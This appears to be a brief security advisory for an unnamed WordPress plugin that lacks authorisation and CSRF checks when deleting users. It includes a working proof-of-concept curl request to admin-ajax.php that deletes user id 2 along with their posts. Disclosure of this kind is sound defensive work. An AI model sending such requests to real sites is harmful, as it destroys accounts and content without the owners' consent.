The plugin does not have authorisation and CSRF when deleting users via an init action handler, allowing unauthenticated attackers to delete arbitrary users (along with their posts)
Invoke the following curl command to delete the user (user id 2)
curl https://example.com/wp-admin/admin-ajax.php --data 'vdeleteit=1&vusers[]=2'